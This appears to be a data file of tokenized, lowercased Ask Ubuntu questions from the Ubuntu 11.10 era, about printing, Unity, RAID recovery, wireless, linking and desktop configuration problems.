69014	unable to print from libreoffice	i recently upgraded to oneiric and am having a strange printing problem . i can print just fine from evince , firefox , and presumably all programs that use the standard gnome printing backend ( as evidenced by the gnome print dialog ) . but when i try to print from libreoffice , the printer spits out the following error message followed by a blank page : error : invalidfont $ definefont stack : -- nostringval -- /hjtlav+timesnewromanps-boldmtfid777hgset1 -- nostringval -- /hjtlav+timesnewromanps-boldmtfid777hgset1 -- nostringval -- -- nostringval -- 13 the printer is a samsung scx-7423p using the generic postscript driver . everything worked fine under natty . any ideas as to the cause of this problem , and more importantly , how to fix it ? edit : here 's some additional information based on testing i did in response to @ scottl 's answer below : i 've tried three oneiric boxes and only this one exhibits this problem . unfortunately , it 's a shared machine , so the impact is significant . exporting to pdf via either the toolbar button or the print to file option produces a file that evince prints fine . if i print to file and arrange for the filetype to be postscript instead of pdf , i get the same error when printing on the affected machine using evince . if i open the file on another machine and print it , everything is ok except that the font does n't look quite right . i 've posted an example postscript file . even though the error output above mentions the font times new roman , the font is n't significant . the postscript test was done using the font ubuntu , and the error was the same except for the font name . all testing was done using the same printer , as it 's the only printer i have access to .
69031	how to configure my login screen to remember last session i used ?	i 'm using 11.04 and i want it to remember the last session i use , unity or ubuntu classic , where can i configure it ? thanks .
69034	software center will not open	the software center will not open from the launcher and i get a segmentation fault when i try to open it from the terminal . 2011-10-18 20:43:45,723 - softwarecenter.ui.gtk3.em - info - em 's : 17 15 21 2011-10-18 20:43:46,396 - softwarecenter.backend.reviews - warning - could not get usefulness from server , no username in config file 2011-10-18 20:43:46,453 - softwarecenter.ui.gtk3.utils - info - softwarecenter style provider for ambiance gtk theme : /usr/share/software-center/ui/gtk3/css/softwarecenter.css segmentation fault however it will open with the command `` sudo software-center '' . once it is open it runs fine , i can install new programs and everything . apt-get and synaptic also both work fine . also , no applications show up in the application lens when i search for them . **edit this is what what i get when i run software-center -- debug http : //pastebin.com/fupfpi5f **edit 2 entering gdb software-center into the terminal gives me : '' /usr/bin/software-center '' : not in executable format : file format not recognized and the run command will not work .
69037	installer does not see windows trying to dual boot .	i am trying to install ubuntu alongside windows . what i boot off the install media and run the installer i get to the patition selection window and it tells me that there are no other operating systems on the computer . i know there are , as i can restart and it will boot into windows also i can mount the two partitions ( windows , data ) and see everything on the partitions . anyone have any ideas on fixing this ? thanks .
69038	how to record compressed video from tv tuner using vlc	update : the previous title for this question was `` how to specify bitrate , codec and demultiplexing for vlc video capture or recording . '' i capture video from old tv tuner card - pinnacle pctv - using vlc . the video is from the composite input and audio is from i guess the mixer or line in . the command i use is : vlc v4l2 : ///dev/video0 : normal=pal : width=720 : height=576 : input=1 : input-slave= '' alsa : //hw:0,0 '' in vlc , i have enabled the advanced controls toolbar , which allows me to record videos when i want to . however , these videos are uncompressed - very big and play only with vlc . totem throws the `` could not demultiplex stream '' error . i need to convert them using winff to reduce their size and make them playable with totem and other software . my question is whether i can configure the recording settings - the codecs and the bitrate , and also get the stream demultiplexed . if i pass any -sout parameter with command i get a `` segmentation fault '' . i use 64-bit ubuntu 10.10 .
69046	unity is not working properly because unity-panel-service was not found	i 've downloaded some updates for ubuntu 11.10 and , after i restarted my computer to the changes take effect , i 've realized that the unity interface was not working properly . the left panel ( where the apps stay ) , and the top bar was also not appearing . i 've restarted my computer again but the things stood the way they were . well , then i tried to force unity to run via terminal , but when i try unityor unity -- reset , the first message that appears is `` unity-panel-service : process not found '' . when i type unity-panel-service on terminal , it also says it is not found . then i searched about it on the web and got this page ( http : //manpages.ubuntu.com/manpages/oneiric/man1/unity-panel-service.1.html ) which says that unity panel service is the process responsible for loading the panels that are missing . so , my question is , how can i re-download or reinstall it so unity can work again ? or , of course , if i 'm wrong and the reason unity is not working is not that , please tell me : )
69047	how to change the position of docky notifications ?	i 'm using docky in ubuntu 11.10 with gnome-shell and sometimes the notifications cover the dock . it would be great if the position of the notifications can be changed .
69050	touchpad tapping intermittent on macbook air	on my 2010 macbook air , tapping on the touchpad works on about only half of the tap attempts . it seems the sensitivity or something is off . how can i fix this ? it looks like this question has been asked before and is unanswered .
69061	magic mouse inertial scrolling and multi-touch gestures	is it possible to use inertial two finger scrolling on ubuntu with a magic mouse and also set up 3 finger swipes to trigger actions in compiz ? maybe using touchegg ? i know it 's possible with the magic trackpad but what about more than normal mouse usage for the magic mouse ? thanks !
69077	how to install google docs extension in libreoffice ?	i want to install a google docs extension in libreoffice such that i can import and export all my documents to and fro . i have tried these instructions but they do n't seem to work properly . is there an updated version of these instructions to install google docs extension in the libreoffice ?
69082	ca n't mount filesystems and computer wo n't shut down	i 've done a fresh install of ubuntu 11.10 and ran the recommended upgrades . two things are not working properly . my windows drives , usb drives , external hard disk can not be mounted . the below error is given unable to mount the filesystem , not authorized . the laptop would n't shut down or restart . lightdm login screen is displayed upon giving both the commands .
69083	gui access to shutdown ?	i have just upgraded to ubuntu 11.10 . there is no shutdown button or apparent means of accessing something similar from the gui . it is extremely annoying having to enter dash , search for the shutdown dialog , and then activate it . the dialog has no apparent means to add it to the panel nor the launcher . is there a known fix or is this a `` feature '' ?
69086	mdadm superblock recovery	after a power cycle i found my raid 5 array no longer working . i tried various methods to reassemble the array but nothing has worked so far . i believe i need to recreate the superblocks and uuids somehow , but was reluctant to barrel into something as to not lose a bunch of data . thanks for reading . cat /etc/mdadm/mdadm.conf : device partitions array /dev/md0 level=raid5 num-devices=4 metadata=0.90 uuid=fd522a0f:2de72d76 : f2afdfe9:5e3c9df1 mailaddr root which is normal . it should have 4x2000gb drives ( sda , sdc , sde , sdd ) . cat /proc/mdstat : personalities : [ linear ] [ multipath ] [ raid0 ] [ raid1 ] [ raid6 ] [ raid5 ] [ raid4 ] [ raid10 ] md0 : inactive sdd [ 1 ] ( s ) 1953514496 blocks unused devices : < none > this is a problem . it only shows one drive in the array and it is also inactive . the array should have sda , sdc , and sde in there as well . when i do a mdadm -- examine /dev/sdd everything looks fine . on the other drives examine says no raid superblock on /dev/sdx . mdadm -- examine -- scan : array /dev/md0 level=raid5 num-devices=4 metadata=0.90 uuid=fd522a0f:2de72d76 : f2afdfe9:5e3c9df1 no help there . mdadm -- assemble -- scan -v : mdadm : looking for devices for /dev/md0 mdadm : no raid superblock on /dev/sde mdadm : /dev/sde has wrong uuid . mdadm : can not open device /dev/sdd : device or resource busy mdadm : /dev/sdd has wrong uuid . mdadm : no raid superblock on /dev/sdc mdadm : /dev/sdc has wrong uuid . mdadm : can not open device /dev/sdb5 : device or resource busy mdadm : /dev/sdb5 has wrong uuid . mdadm : no raid superblock on /dev/sdb2 mdadm : /dev/sdb2 has wrong uuid . mdadm : can not open device /dev/sdb1 : device or resource busy mdadm : /dev/sdb1 has wrong uuid . mdadm : can not open device /dev/sdb : device or resource busy mdadm : /dev/sdb has wrong uuid . mdadm : no raid superblock on /dev/sda mdadm : /dev/sda has wrong uuid . from this it looks like i have no uuids and no superblocks for sda , sdc , and sde . sudo fdisk -l disk /dev/sda : 2000.4 gb , 2000397852160 bytes 255 heads , 63 sectors/track , 243201 cylinders , total 3907027055 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/sda does n't contain a valid partition table disk /dev/sdb : 250.1 gb , 250058268160 bytes 255 heads , 63 sectors/track , 30401 cylinders , total 488395055 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x353cf669 device boot start end blocks id system /dev/sdb1 63 476327249 238163593+ 83 linux /dev/sdb2 476327250 488392064 6032407+ 5 extended /dev/sdb5 476327313 488392064 6032376 82 linux swap / solaris disk /dev/sdc : 2000.4 gb , 2000397852160 bytes 255 heads , 63 sectors/track , 243201 cylinders , total 3907027055 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/sdc does n't contain a valid partition table disk /dev/sdd : 2000.4 gb , 2000398934016 bytes 255 heads , 63 sectors/track , 243201 cylinders , total 3907029168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/sdd does n't contain a valid partition table disk /dev/sde : 2000.4 gb , 2000397852160 bytes 255 heads , 63 sectors/track , 243201 cylinders , total 3907027055 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/sde does n't contain a valid partition table so from this it looks like none of my raid disks have a partition table or uuid . the closest thing i found to my problem was this thread , which suggested running mdadm -- create /dev/md0 -v -l 5 -n 4 /dev/sda /dev/sdc /dev/sde /dev/sdd and checking for a valid filesystem with fsck -fn /dev/md0 . however , the first command spit out mdadm : no raid-devices specified . i retried the command using sda1 , sdc1 , etc , but then i get this : mdadm : layout defaults to left-symmetric mdadm : chunk size defaults to 512k mdadm : layout defaults to left-symmetric mdadm : layout defaults to left-symmetric mdadm : super1.x can not open /dev/sda1 : no such file or directory mdadm : ddf : can not open /dev/sda1 : no such file or directory mdadm : can not open /dev/sda1 : no such file or directory mdadm : device /dev/sda1 not suitable for any style of array if i do a create and leave sda1 as a `` missing '' variable in the command then it just says the same thing for sdc1 . i am sure that i am making this more complicated than it needs to be . can someone with experience please help me ? thanks for your time in advance . *edit* when i run dumpe2fs /dev/sda i get : dumpe2fs 1.41.14 ( 22-dec-2010 ) filesystem volume name : < none > last mounted on : < not available > filesystem uuid : bbe6fb91-d37c-414a-8c2b-c76a30b9b5c5 filesystem magic number : 0xef53 filesystem revision # : 1 ( dynamic ) filesystem features : has_journal ext_attr resize_inode dir_index filetype needs_recovery sparse_super large_file filesystem flags : signed_directory_hash default mount options : ( none ) filesystem state : clean errors behavior : continue filesystem os type : linux inode count : 366288896 block count : 1465135872 reserved block count : 73256793 free blocks : 568552005 free inodes : 366066972 first block : 0 block size : 4096 fragment size : 4096 reserved gdt blocks : 674 blocks per group : 32768 fragments per group : 32768 inodes per group : 8192 inode blocks per group : 512 filesystem created : wed oct 28 12:23:09 2009 last mount time : tue oct 18 13:59:36 2011 last write time : tue oct 18 13:59:36 2011 mount count : 17 maximum mount count : 26 last checked : fri oct 14 17:04:16 2011 check interval : 15552000 ( 6 months ) next check after : wed apr 11 17:04:16 2012 reserved blocks uid : 0 ( user root ) reserved blocks gid : 0 ( group root ) first inode : 11 inode size : 256 required extra isize : 28 desired extra isize : 28 journal inode : 8 default directory hash : half_md4 directory hash seed : 17e784d8-012e-4a29-9bbd-c312de282588 journal backup : inode blocks journal superblock magic number invalid ! so stuff is still there . still researching ...
69091	installation needs 4.4gb but only have two 3.5gb ssd	the ubuntu 11.10 install states it needs 4.4gb . the system has only two 3.5gb ssd . what next ?
69094	error in installing languagetool-1.5 on libreoffice	i am getting the following error while installing the latest languagetool-1.5 on libreoffice . i have already uninstalled the previous languagetool using the below command . please help me to install the latest languagetool . $ unopkg remove org.openoffice.languagetool.oxt
69095	gst-launch script suddenly not working	i have a script for recording output sound [ youtube/skype ] based on gst-launch using a 'pulsesrc device= $ monitor ' line where the $ monitor is parsed via 'pactl stat ' and this script worked fine in versions up to the latest [ 11.10 ] . there are no error messages , it seems to record , but the resulting mp3 is blank . recording from mic is fine and all . i have all latest updates applied .
69099	how do i remove the shutdown confirmation menu ?	how do i remove the shutdown confirmation menu saying `` are you sure you want to shut down '' ? this is the menu that pops up after i press shut down . i ca n't navigate to it in gconf_editor using the old instructions for 10.04 or 11.04 .
69102	compiz grid feature abruptly stopped working correctly . now ctrl +alt + num 4 and num 6 only allow half screen tiling	i 've used the compiz grid function for a long time and i generally use it to set my browser to the right 2/3 or 3/4 of the screen and have other apps on the top or bottom half of the remaining part . now when i press ctrl + alt numpad 4 or numpad 6 it only does half and when pressing it a second or third time it does nothing . the options for different sizes work for all the corners and top and bottom . the upper right is also behaving the same as the top option . currently i 'm using ubuntu 11.10 64 bit i 've tried the following commands : unity -reset gconftool-2 -- recursive-unset /apps/compiz-1 ( followed by another unity -reset ) i 've deleted ~/.compiz-1 and logged out and in . i 've disabled and reenabled grid from ccsm . ( this segfaults unity btw ) i 'm afraid to uninstall and reinstall compiz or the grid plugin as it is pretty deeply embeded into unity and will probably break things . if anybody has any suggestions or knows what will happen if i uninstall compiz or grid i 'd love to know . otherwise i may reinstall ubuntu 11.10
69103	problem with network printing	version : 11.10 problem : i add a printer using `` printers '' function , it successfully detect the network printer `` ricoh aficio 3045 '' and everything seems fine..until i try to print a test page.. it 's not printing even-though it shows send successfully in the print status .. the device uri says `` socket : //192.168.7.239:9100 '' and print state is `` idle '' everything seems to be working.. but it just wo n't print ! im lost here..anyone know what 's going on here ?
69104	how do i assign a launchpad bug to an external tracker ?	i have encountered an application issue that i know has a bug assigned in both launchpad and the external tracker the application project actually uses ( in this case google code ) . i understand that launchpad can integrate with external trackers ( and can see an example assigned against another package in this bug ) . i have a launchpad login . i can click on the pencil icon next to the status to change it ( for example , change to `` confirmed '' ) but i do n't get an option to associate the bug with an external issue , which is what i actually want to do . do i not have permission to , or is there some other option that i 'm missing ?
69105	my default mouse cursor does n't change , no matter which theme i use	if i open gnome-tweak-tool , go to the theme section and choose the dmz-black cursor theme , my default cursor stays exactly the same . however , the other cursor images ( like when i move a window or hover over a link ) are the correct ones from the dmz-black theme . the same happens if i choose the adwaita theme , for example . does anyone know why this is ? how can i completely change my cursor theme so that the default cursor is also changed ?
69107	how do i replace the background-1.xml file under /usr/share/backgrounds/contest/ ?	help with the background-1.xml file under /usr/share/backgrounds/contest/ . i screwed my .xml file ... and the dumb here that is writing right now , did n't keep a safe copy of the original file/code ... would somebody send me the original code from the oneiric 11.10 version , or the .xml file itself ?
69109	update problem : some index files failed to download from ppa	error message : w : failed to fetch http : //ppa.launchpad.net/bisigi/ppa/ubuntu/dists/oneiric/main/source/sources 404 not found w : failed to fetch http : //ppa.launchpad.net/bisigi/ppa/ubuntu/dists/oneiric/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead .
69114	how do i logout using only the keyboard ?	in ubuntu 11.04 , ctrl-alt-del gives me a menu with shutdown , hibernate , suspend and restart , but no logout . is there a key combination to logout of ubuntu ? is there a way to provide one ?
69116	how to set custom system sounds	i would like to know how to change the system sounds in ubuntu 11.10 to my sounds . i have .wav and i know i have to use .ogg . but still my sounds are executable files and system sounds are symbolic links . so how do you change them ? step by step if you can .
69118	can i access my files from a command line of root @ nameem250 : ?	my upgrade to 11.10 failed some how . now i ca n't get ubuntu to reboot . i get a command line and now i just want to go and save my documents , pictures , ect . and just do a clean install . how do i access my files to back them up ?
69119	linking problems after updating to 11.10	right now i am having difficulties linking a project i am working on with gcc4.6 in ubuntu 11.10 . before the distribution upgrade everything linked fine and it still compiles/links on the other developers machines . currently the compile succeeds then the linking fails with the following : /usr/bin/ld : error : can not open crt1.o : no such file or directory /usr/bin/ld : error : can not open crti.o : no such file or directory /usr/bin/ld : error : can not open crtn.o : no such file or directory collect2 : ld returned 1 exit status make : *** [ mc ] error 1 here 's some info on what i am using : $ gcc -v using built-in specs . collect_gcc=gcc collect_lto_wrapper=/usr/lib/gcc/x86_64-linux-gnu/4.6.1/lto-wrapper target : x86_64-linux-gnu configured with : ../src/configure -v -- with-pkgversion='ubuntu/linaro 4.6.1-9ubuntu3 ' -- with-bugurl=file : ///usr/share/doc/gcc-4.6/readme.bugs -- enable-languages=c , c++ , fortran , objc , obj-c++ , go -- prefix=/usr -- program-suffix=-4.6 -- enable-shared -- enable-linker-build-id -- with-system-zlib -- libexecdir=/usr/lib -- without-included-gettext -- enable-threads=posix -- with-gxx-include-dir=/usr/include/c++/4.6 -- libdir=/usr/lib -- enable-nls -- with-sysroot=/ -- enable-clocale=gnu -- enable-libstdcxx-debug -- enable-libstdcxx-time=yes -- enable-plugin -- enable-objc-gc -- disable-werror -- with-arch-32=i686 -- with-tune=generic -- enable-checking=release -- build=x86_64-linux-gnu -- host=x86_64-linux-gnu -- target=x86_64-linux-gnu thread model : posix gcc version 4.6.1 ( ubuntu/linaro 4.6.1-9ubuntu3 ) $ ldd -- version ldd ( ubuntu eglibc 2.13-20ubuntu5 ) 2.13 copyright ( c ) 2011 free software foundation , inc . this is free software ; see the source for copying conditions . there is no warranty ; not even for merchantability or fitness for a particular purpose . written by roland mcgrath and ulrich drepper . $ find /usr -name `` crt1.o '' /usr/arm-linux-gnueabi/lib/crt1.o /usr/lib32/crt1.o /usr/lib/x86_64-linux-gnu/crt1.o /usr/lib/debug/usr/lib32/crt1.o /usr/lib/debug/usr/lib/x86_64-linux-gnu/crt1.o /usr/arm-linux-gnueabihf/lib/crt1.o happy to post any other info as needed !
69120	100 % cpu usage with `` on demand '' setting due to xorg	i upgraded to oneiric ( from natty ) on my ibm thinkpad x41 . with the default cpu speed setting of `` on demand '' i get 100 % cpu usage . in system monitor ( nb : view > all processes ) the dominant process is xorg with 60 - 70 % cpu usage ( and 13.7 mib ) , followed by gdl-box with about 20-25 % and gnome-system-monitor with about 20 % . was it a mistake to upgrade to oneiric ? how can i fix this ? i now set the cpu speed manually to 1 ghz - but that ca n't be the solution ... not very happy ... thank you .
69121	usb stick modem stopped connecting after upgrade to 11.10	my usb stick modem does not connect after upgrading to 11.10 . it worked ok on 11.04 . it is found now ( the connection called `` o2 default 1 '' in my case is active ) , however it does not connect automatically as it used to do and when i try to connect it manually it shows `` home network selected '' or something for a second and than it disconnects ( and when trying to connect again , it says `` modem network disconnected '' immediately ) . thanks for your help , it is needed ( - :
69122	gdialog can not output variable	copied='cp -v *snapshot.jar /home/user/folder' $ copied prints information about copied files however gdialog -- title `` done '' -- clear -- yesno `` done $ copied '' 15 60 shows command that was executed , so it shows done cp -v *snapshot.jar /home/user/folder how to make gdialog show information about copied files ?
69123	how to set the configuration of taskbar ?	i want to change taskbar from left side to bottom , and i do n't want it to be hide . how to do that ?
69132	why is sysinfo reporting gnome 2 rather than gnome 3	after upgrading from 11.04 ( n.n . ) to 11.10 ( o.o . ) , i have many problems . the first problem is that i was expecting gnome to be updated to gnome 3 . however , sysinfo reports : release : ubuntu 11.10 ( oneiric ) gnome : 2.32.1 kernel : 3.0.0-12-generic i executed the unity_support_test to assure that unity 3d is supported by my graphics hardware . the result follows . 1 $ /usr/lib/nux/unity_support_test -p opengl vendor string : ati technologies inc. opengl renderer string : amd radeon hd 6620g opengl version string : 4.1.11005 compatibility profile context not software rendered : yes not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : yes however , i can not discern whether unity 3d is actually executing . it looks identical to ubuntu 2d ( as identified on the session login screen ) , which i am guessing is the unity 2d configuration . my question is : why is sysinfo reporting gnome 2 rather than gnome 3 ?
69135	is there a ppa for gcc4.7 ?	are there any good ppa 's for gcc4.7 and the required libstdc++ ? perferably for ubuntu 11.10 , any links are appreciated !
69137	conflicting dependency error when updating from eclipse 3.7 to 3.7.1	when i click on check for updates , and select all , next , this is the error im getting . i 'm using a 64 bit ubuntu 11.10 . i 'm not able to get pdt working either . any kind of help would be appreciated . can not complete the install because of a conflicting dependency . software being installed : eclipse platform 3.7.1.m20110909-1335 ( org.eclipse.platform.ide 3.7.1.m20110909-1335 ) software currently installed : shared profile 1.0.0.1317160468326 ( sharedprofile_platformprofile 1.0.0.1317160468326 ) only one of the following can be installed at once : equinox provisioning operations api 2.1.0.v20110511-1821 ( org.eclipse.equinox.p2.operations 2.1.0.v20110511-1821 ) equinox provisioning operations api 2.1.0.dist ( org.eclipse.equinox.p2.operations 2.1.0.dist ) can not satisfy dependency : from : shared profile 1.0.0.1317160468326 ( sharedprofile_platformprofile 1.0.0.1317160468326 ) to : org.eclipse.equinox.p2.operations [ 2.1.0.dist ] can not satisfy dependency : from : equinox p2 core function 1.0.1.r37x_v20110906-8290fz3fuqiclqkvkeatdn_14c7g ( org.eclipse.equinox.p2.core.feature.feature.group 1.0.1.r37x_v20110906-8290fz3fuqiclqkvkeatdn_14c7g ) to : org.eclipse.equinox.p2.operations [ 2.1.0.v20110511-1821 ] can not satisfy dependency : from : equinox p2 provisioning for ides . 2.1.2.r37x_v20110815-1155-6-bj9jxoeqxouryc-l9bl7rdeqo7 ( org.eclipse.equinox.p2.user.ui.feature.group 2.1.2.r37x_v20110815-1155-6-bj9jxoeqxouryc-l9bl7rdeqo7 ) to : org.eclipse.equinox.p2.core.feature.feature.group [ 1.0.1.r37x_v20110906-8290fz3fuqiclqkvkeatdn_14c7g ] can not satisfy dependency : from : eclipse platform 3.7.1.m20110909-1335 ( org.eclipse.platform.ide 3.7.1.m20110909-1335 ) to : org.eclipse.equinox.p2.user.ui.feature.group [ 2.1.2.r37x_v20110815-1155-6-bj9jxoeqxouryc-l9bl7rdeqo7 ]
69141	intel 3956abg wpa wireless not working on thinkpad t60	i recently upgraded my thinkpad t60 from ubuntu 11.04 to 11.10 . my wireless worked on 11.04 without a problem . using 11.10 , it detects all the wireless networks available , but will not connect to it . it does however connect to any non-encrypted network . my wireless network uses wpa2-personal . the problem is not my wireless network , as my other devices can connect to it properly . how can i get my thinkpad t60 's wireless working again on 11.10 ? the wireless interface is a pro/wireless 3945abg [ golan ] network connection from intel corporation . threads i 'm following on ubuntu forum : having trouble connecting to wpa after upgrade to 11.10 [ 64 bit ] ca n't connect to wireless after 11.10 upgrade i posted a wireless issue too : intel 3956abg wireless not working with wpa
69142	ubuntu unlock screen is `` checking password ... '' too slow	question when i do n't use my laptop ( with ubuntu 11.10 ( x64 ) and unity 2d ) for 5-10 minutes , it automatically locks . after that , when i 'm trying to unlock it , it asks for the password . after i enter a password , it takes a random time from about 1 to about 100 seconds for it to unlock . are there any ways to speed up the unlock screen ? what was done found a similar question on ubuntuforums.org suggests to look at bug # 515155 , which suggests that the problem has something to do with pam_ecryptfs . using instructions , described there , i 've looked at my etc/pam.d/common-auth file , but it says nothing about pam_encryptfs . searched /var/log/syslog.log for information . nothing useful . searched /var/log/auth.log for information . i 've found the following messages there , dated to unlock time : gnome-screensaver-dialog : pam_krb5 ( gnome-screensaver : auth ) : authentication failure ; logname=victor uid=1000 euid=1000 tty=:0.0 ruser= rhost= gnome-screensaver-dialog : gkr-pam : unlocked login keyring i have n't used su and sudo for a few hours . at the time of these messages i 've just logged in .
69147	install an application so that it can be launched from the terminal	i had to update my firefox from ver 3 ( i.e . the one that ubuntu 10.04 ships with ) and move it to firefox 7 . so firefox gave a tar.gz file to extract the browser from . i ran sudo apt-get remove firefox , and then extracted the contents of the tarball to /opt/ . but when i type the command firefox in the terminal it responds by saying firefox not installed . i am now using a launch shortcut to open firefox , but what i want to know is how can i install the application so that i can open it from the terminal ?
69151	how do i set my own ( html ) theme in lightdm ?	lightdm is the new login manager , and is meant to be themeable using html and css . how do i do that in ubuntu 11.10 ? can i use my own html file with my own text ? things i 've tried : i 've spent a little while googling about and found nothing very useful so far , apart from how to change the background image . there is a launchpad answer referencing a theme directory but no clue as to what should go in the theme directory . it appears there used to be a /usr/share/lightdm/themes directory , but it is not on my system . i 've spent a while looking but have n't found the files the current theme is in - if i could find that i could try copying and adapt it - i 've done dpkg -l of both the lightdm and unity-greeter packages but not seen any html or css files . i have found the lightdm reference manual but that appears to be an api reference , not a configuration guide . i have tried browsing the lightdm code but ca n't find any sample html/css files . edit : to clarify i 'd like to be able to edit an html file so i can add text to the login screen , not just change the fonts and background image . sorry to @ jokerdino who answered an unclear question . edit 2 : found a few more clues , but will have to play with them later . i have found /usr/share/lightdm-gtk-greeter/greeter.ui which is part of the lightdm-gtk-greeter package . it is an xml file that looks a bit like the login screen , but i 'm not familiar with how to edit that . i have also found this sample html file which i can look at the source of ( provided i do n't let it time out - 5 seconds ) . it 's linked to this javascript file which fakes lightdm for the web mockup . so maybe i can try putting a modified version of the html file in a directory and call that the theme directory ... but will have to try later - unless someone writes up some working instructions before then - hint , hint .
69152	gui logon into remote system	i 'm looking for something similar to rdp for linux . i know vnc , but it doesnot work like rdp - it just sends images of screen , mouse position , keystrokes , etc . rdp just sends info that i 've just clicked the button-widget . i know i can forward xs ( i 'm currently using this ) , but this way i can use only widnows i opened from console . also , it works nice only with small gtk or qt based applications . running eclipse is a nightmare . what i 'm looking for is to work remotely as if i was working on my computer .
69155	google.com and youtube.com not working	trying to access google.com or youtube.com in any browser ( ff , chrome , ephiphany , w3m ) does not work ( `` could not find www.google.com '' ) . i can ping both services with no problem . are there dns problems again ?
69159	how to download stanford open classroom videos ?	i am using ubuntu 11.10 & want to download stanford open classroom videos..basically for offline viewing , ex : http : //openclassroom.stanford.edu/mainfolder/coursepage.php ? course=webapplications thanx in advance
69160	windows expand over 2 monitors in quad-monitor setup	i just installed ubuntu 11.10 with my previous hardware setup : 4 monitors and 2 identical nvidia graphic cards . draging windows around all 4 monitors works nice , but when i maximize a window it expand always over 2 screens . ( 2x twinview ) . i had an workaround for this in 11.04 but cant remember what it was ... may one of you guys have quad monitors up and running with window maximizing on only one screen my xorg.conf looks like this : # nvidia-settings : x configuration file generated by nvidia-settings # nvidia-settings : version 280.13 ( buildd @ allspice ) thu aug 11 20:54:45 utc 2011 # nvidia-xconfig : x configuration file generated by nvidia-xconfig # nvidia-xconfig : version 280.13 ( buildmeister @ swio-display-x86-rhel47-03.nvidia.com ) wed jul 27 17:15:58 pdt 2011 section `` serverlayout '' # removed option `` xinerama '' `` 1 '' # removed option `` xinerama '' `` 0 '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 screen 1 `` screen1 '' 0 1080 inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 1 '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` unknown '' modelname `` samsung smb2220n '' horizsync 31.0 - 80.0 vertrefresh 56.0 - 75.0 option `` dpms '' endsection section `` monitor '' identifier `` monitor1 '' vendorname `` unknown '' modelname `` samsung smb2220n '' horizsync 31.0 - 80.0 vertrefresh 56.0 - 75.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gtx 550 ti '' busid `` pci:2:0:0 '' endsection section `` device '' identifier `` device1 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gtx 550 ti '' busid `` pci:3:0:0 '' endsection section `` screen '' # removed option `` twinview '' `` true '' # removed option `` metamodes '' `` nvidia-auto-select , nvidia-auto-select '' # removed option `` metamodes '' `` crt-0 : nvidia-auto-select 1920x1080 +0+0 , crt-1 : nvidia-auto-select 1920x1080 +1920+0 '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` twinview '' `` 1 '' option `` twinviewxineramainfoorder '' `` crt-0 '' option `` metamodes '' `` crt-0 : nvidia-auto-select +0+0 , crt-1 : nvidia-auto-select +1920+0 '' subsection `` display '' depth 24 endsubsection endsection section `` screen '' # removed option `` twinview '' `` true '' # removed option `` metamodes '' `` nvidia-auto-select , nvidia-auto-select '' # removed option `` metamodes '' `` crt-0 : nvidia-auto-select 1920x1080 +0+0 , crt-1 : nvidia-auto-select 1920x1080 +1920+0 '' identifier `` screen1 '' device `` device1 '' monitor `` monitor1 '' defaultdepth 24 option `` twinview '' `` 1 '' option `` twinviewxineramainfoorder '' `` crt-0 '' option `` metamodes '' `` crt-0 : nvidia-auto-select +0+0 , crt-1 : nvidia-auto-select +1920+0 '' subsection `` display '' depth 24 endsubsection endsection section `` extensions '' option `` composite '' `` disable '' endsection
69165	disable focus for all windows of same type when using alt+tab in unity	in ubuntu 11.10 oneric the alt+tab feature has changed . it now switches between applications and leaves a tiny delay or keypress before letting you switch between windows within a certain application . i like this feature , but there is one thing bugging me : is there a way to disable the raising of all windows within the same application and instead only raise the latest used ? to elaborate this more clearly : if i have 10 terminal windows open and want to switch between one of these terminals and firefox with alt+tab , i end up having ten terminal windows cluttering my desktop whenever i switch back and forth . this makes it hard to read commands from firefox while having the terminal open , since all other terminals are raised above firefox ' window .
69168	install package with apt-get and remove with aptitude ?	anything wrong with this practice ? would it work ? if i install package with apt-get and remove with aptitude ? in addition , i recently removed webmin . does apt-get -- purge remove - delete also dependencies installed during apt-get install webmin ? how do i check for those and remove if it did n't get removed automatically ?
69170	why was the synaptic package manager removed from ubuntu 11.10 ?	i recently tried the new ubuntu release and when i wanted to change the cache setting of ubuntu update , i noticed that the synaptic package manager was no longer available . why ? it was one of most useful applications in ubuntu in my opinion .
69186	can i control which screen xfce shows the alt-tab switcher on ?	i 'm trying to transition from gnome to xfce and when i use alt+tab to cycle between windows , the list of windows shows on the wrong screen ( i have an nvidia card with twinview spanning the desktop over an lcd and my tv . ) can this be controlled ? ideally it would always display on the lcd only , failing that , can i disable it but keep alt+tab functional ?
69187	skype throws a symbol lookup error after upgrade to 11.10	upgraded to 11.10 and skype is no longer working . i get the following error : skype : symbol lookup error : skype : undefined symbol : _zn5qfile3mapexxns_14memorymapflagse tried both downloading from skype and from the ubuntu software center .
